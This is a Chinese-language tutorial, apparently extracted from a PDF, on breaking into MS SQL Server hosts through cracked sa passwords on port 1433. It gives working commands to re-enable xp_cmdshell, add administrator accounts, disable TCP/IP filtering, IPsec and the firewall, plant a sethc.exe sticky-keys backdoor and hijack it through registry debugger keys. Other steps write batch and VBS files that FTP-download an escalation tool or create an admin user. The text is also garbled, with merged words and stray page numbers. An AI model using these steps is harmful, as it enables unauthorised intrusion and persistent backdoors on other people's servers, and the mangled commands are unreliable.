1433口令提权详细过程及错误修复

1、前段时间我朋友给我一个sopo 的软件，说是扫1433 口令的，而且猜解速度很快，我就找个服务器试了试，确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下 1433 错误的恢复和提权。（有人可能会说了，这有啥好研究的， sa 的权限直接加用户到超管不就成了吗。其实在 sa 权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧）下面来说sa 下执行命令错误的几种情况：1、无法装载 DLL xpsql70.dll或该 DLL所引用的某一 DLL。原因 126（找不到指定模块。）这种情况比较常见的，修复起来说简单也简单，但是有条件的。这种情况要是能列出目录（用 sqltools v2.0

2、就有列目录功能）恭喜你这个有 80%的情况能修复了，如果能列目录，那么只要找到 xplog70.dll 的路径执行以下命令就可以了。第一步exec sp_dropextendedproc xp_cmdshell（这个命令就是删除原有的cmdshell，因为已经出错了）第二步dbccaddextendedproc（“xp_cmdshell ”, “c:xplog70.dll ）”;EXEC sp_configure show advanced options, 0当然这是 sql 命令，用查询分析器执行。第二步里的c:ProgramFilesMicrosoftSQLServerMSSQLBinn

3、xplog70.dll就是 xplog70.dll 的路径，这个路径是比较常见的，如果 c 盘没有可以找找其他盘符。2、无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因： 127（找不到指定的程序。）其实这个跟上面的 126 是一样的就是 cmdshell 出错了只要找到备份的 xplog70.dll 按照上面的方法就能修复了。1 / 73、未能找到存储过程 masterxpcmdshell这种情况我看到网上的方法是：第一步先删除：drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dr

4、opextendedproc xp_cmdshell第二步恢复：dbcc addextendedproc（“ sp_oacreate” , “ odsole70）.dll”dbcc addextendedproc（“ xp_cmdshell” , “ xplog70）.dll”其实这个跟上面的还是一样，其实如果细心的话，上面的126 127只执行第一步的时候就会出现未能找到存储过程 masterxpcmdshell因为第一步就是删除 cmdshell 的存储过程。所以这种情况下只执行上面的第二个步骤就可以了。4.ErrorMessage:SQLServer阻止了对组件 xp_cmdshell的

5、过程 sys.xp_cmdshell 的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 xp_cmdshell 。有关启用 xp_cmdshell的详细信息，请参阅 SQL Server联机丛书中的 “外围应用配置器 ”。这种情况是最简单的了，因为什么都不用考虑，直接执行以下命令就可以了;EXEC sp_configure show advanced options, 1 -;RECONFIGURE WITH OVERRIDE -;EXEC sp_configure xp_cmdshell, 1 -;RECONFIGURE WIT

6、H OVERRIDE -;EXEC sp_configure show advanced options, 02 / 7经过上面的修复能够执行 cmd 命令了，下面就要开始提权了。我一般都是 ipconfig 先查下 ip 看看是不是内网，然后 REG queryTerminal“” ServerWinStationsRDP-Tcp/v PortNumber 查看一下终端端口，再 netstatan 看看终端是否打开然后 netuser 用户密码 /add 加个用户再 netlocalgroupadministrators 用户 /add 一切顺利的话，这就拿下一个服务器了。但是在这个过程中还

7、会遇到很多问题。1、net 提权成功但是连接不上终端有下面几种情况1）、服务器在内网。2）、做了 tcp/ip 筛选。先执行下面 cmd 命令：cmd/cregedit-ec:1.regHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpip，导出注册表里关于 TCP/IP筛选的第一处cmd/cregedit-ec:2.regHKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip，导出注册表里关于 TCP/IP筛选的第二处cmd/cregedit-ec:3.regHKEY_LOCAL_MACHINESYS

8、TEMCurrentControlSetServicesTcpip “，导出注册表里关于 TCP/IP筛选的第三处然后回到 c 盘 1.reg,2.reg,3.reg，把 1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下，找到 EnableSecurityFilters这个字段看看 dword 后面的键值是否为 00000000，如果为 00000001 就说明管理员做了 tcp/ip 筛选，我们只要把 1 改成 0 就行了， 2.reg 和 3.reg 进行一样的修改。（ 3）、做了 ip 安全策略。执行 cmd 命令： cmd /c net stop policyagen

9、t 将 IPSEC Services服务停了它。再连终端。3 / 74）、管理员设置的终端登陆权限只有指定的用户可以。5）、防火墙。执行 cmd 命令： net stop alg /ynet stop sharedaccess2、net提权出现拒绝访问可以尝试一下net1 user 用户密码 /add 如果 net1 也是拒绝访问可以copy 一个 shfit 后门试试执行 cmd 命令： copy c:windowsexplorer.exec:windowssystem32sethc.execopy c:windowssystem32sethc.exe c:windowssystem32dl

10、lcachesethc.exe如果提示复制 1 文件哪么证明成功了。连接终端然后按 5 下 shift 看看蹦出来了什么。玩咔咔资源管理器，现在只要手工加个用户就好了。3、net 提权出现拒绝访问错误5（重点）这种情况就不用尝试net1 了，可以试试 copy shift 后门，如果 copy 后提示复制 0 文件，证明没有成功。那么可以试试能不能上传，如果能上传直接传个前段时间出来的无 net 提权工具，然后加个用户就可以了。但是这种情况大部分都是不能上传的，那么就要考虑一下了。既然能执行 cmd，那么就能通过 cmd 下 ftp 下载文件，可是 ftp 前提是要能写进文本或批处理。那么就可

11、以通过 sql 语句写进一个文本或批处理啊。 declare o int, f int, t int, ret intexec sp_oacreate scripting.filesystemobject, o out exec sp_oamethod o, createtextfile, f out, C:1.bat, 1 exec ret = sp_oamethod f, writeline, NULL,open IP exec ret = sp_oamethod f, writeline, NULL,ftp 账号 exec ret = sp_oamethod f, writeline,

12、NULL,ftp 密码 exec ret = sp_oamethod f, writeline, NULL,get en.exe（无 net 提权脚本） c:en.exeexec ret = sp_oamethod f, writeline, NULL,bye4 / 7查询分析器执行成功后，不出意外，会在 c 盘出现一个 1.bat（如果执行成功了， c 盘却没有，可以换个文件夹写入，因为哪个服务器 c 盘根目录禁止写入）然后 cmd 执行 ftp -s:c:1.bat这个执行完了以后，就会在 c 盘 ftp 下载一个无 net 提权脚本或者直接写个 vbs 提权脚本declare o int

13、, f int, t int, ret intexec sp_oacreate scripting.filesystemobject, o outexec sp_oamethod o, createtextfile, f out, c:1.vbs, 1exec ret = sp_oamethod f, writeline, NULL,Seto=CreateObject （”Shell.Users）“exec ret = sp_oamethod f, writeline, NULL,Set z=o.create（”用户 “） exec ret = sp_oamethod f, writeline

14、, NULL,z.changePassword密码”“ , ”“ exec ret = sp_oamethod f, writeline, NULL,z.setting（”AccountType）“=3然后 cmd 执行 cscript c:1.vbs 就可以了4、前面说的是修复成功能执行 cmd 命令的，但是有的修复后，又会出现新的问题1）、 Message:在执行 xp_cmdshell 的过程中出错。调用 CreateProcess失败，错误代码： 5 。错误 5 是个系统提示的错误号， CreateProcess这个是创建线程的意思，这个错误产生和系统文件 cmd.exe 有很大的关系

15、，一种情况是 cmd 被删除，一种是 cmd 的权限被降低了。SQL查看终端端口及开放情况：execmasterxp_regreadHKEY_LOCAL_MACHINE,SYSTEMCurrentControlSetCo ntrolTerminal5 / 7ServerWinStationsRDP-Tcp,PortNumber好了，下面关键的地方了，要用到两条 sql 指令，将系统的 explorer 文件复制为系统的 shift 后门文件，下面两条语句为分别执行的。这条语句将 explorer.exe 复制为 sethc.exedeclare o int exec sp_oacreate s

16、cripting.filesystemobject, o out execsp_oamethodo,copyfile,null,c:windowsexplorer.exe,c:windowssystem32sethc.exe;这条语句将 sethc.exe 复制到 dllcache 目录下declareoointexecsp_oacreatescripting.filesystemobject,oooutexecsp_oamethodoo,copyfile,null,c:windowssystem32sethc.exe,c:windowssystem32dllcachesethc.exe;另外

17、这两条语句使用到的 sp_oacreate 存储过程需要使用到 odsole70.dll 这个文件，所以这个文件的存亡，关系到创建的成功与否。2）、 xpsql.cpp:错误 5 来自 CreateProcess（第 737 行）这种情况就是比较棘手的了，网上说这种情况4.0Engines,SandBoxMode,REG_DWORD,0Select*FromOpenRowSet（ell（” netuser 123 123 /add）；“Select*FromOpenRowSet（” netlocalgroup administrators 123 /add）； “这样直接加用户就成了，我查了查

18、这6 / 7个事利用的沙盘提权，但是通过我的实践，这个成功率很低，因为大部分的服务器都把 c:windowssystem32iasias.mdb 给删掉了。那么可以试试映像劫持 sethc，当然映像劫持也是有条件的， 1 要存在 xp_regwrite 这个存储过程 2 就是HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowssethc.exe,Debugger这个键值没有被删可以先 sql 命令查询一下注册表粘滞键是否被劫持execmasterxp_regreadHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindow sNTCurrentVersionImage File Execution Optionsse